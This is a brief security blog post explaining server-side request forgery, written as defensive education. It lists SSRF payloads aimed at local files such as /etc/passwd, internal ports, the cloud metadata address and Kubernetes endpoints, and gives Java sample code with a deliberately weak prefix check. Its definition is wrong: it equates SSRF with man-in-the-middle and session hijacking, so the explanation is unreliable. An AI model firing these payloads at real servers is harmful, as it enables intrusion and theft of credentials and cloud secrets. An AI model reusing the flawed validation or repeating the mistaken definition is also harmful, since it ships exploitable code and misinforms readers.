Server-Side Request Forgery

Contact us

Security

January 25, 2024

Blog

Server-Side Request Forgery

This attack vector exploits vulnerabilities in server communication by manipulating network connections established by the application server. This manipulation, known as man-in-the-middle (MITM) or session hijacking, allows attackers to:

Redirect server requests: Instead of reaching their intended destination, requests get rerouted to malicious actors who can intercept and alter data.
Port scan internal servers: By analyzing traffic flow, attackers can identify and map internal servers, increasing their attack surface.
Expose sensitive data: Intercepted requests or responses might contain confidential information like user credentials or financial data.
Access cloud service metadata: Attackers can potentially exploit leaked metadata to gain unauthorized access to cloud storage and databases.
Compromise internal services: Once inside the network, attackers can infiltrate and exploit internal services, causing critical disruptions.

SSRF versus Infrastructure

Below you can see the vulnerability examples

Affected Endpoint:

https://victim.com/api/v1/ui/getresource?rid=https://internal.victim.com/storage/logo.png

Payloads:

file:///etc/passwd
http://localhost:8080/
https://internal.victim.com:3306/
http://169.254.169.254/metadata/v1.json
https://kubernetes.default.svc/metrics

ftp://internal.victim.com

Affected Endpoint (weak host validation):

https://victim.com/api/v1/ui/getresource?rid=storage/logo.png

Sample code:

String baseUrl = “http://internal.victim.com”;
String resource = String.format(“%s/%s”, baseUrl, rid);
if (resource.startsWith(baseUrl)) {
HttpResponse response = (new HttpClient()).target(resource).get();
return (response.getStatus() == 200)
? response.getStream()
: response.getErrorMessage();
}